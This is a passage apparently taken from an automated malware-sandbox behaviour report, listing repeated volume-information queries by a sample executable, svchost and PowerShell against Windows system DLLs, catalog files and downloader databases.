                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
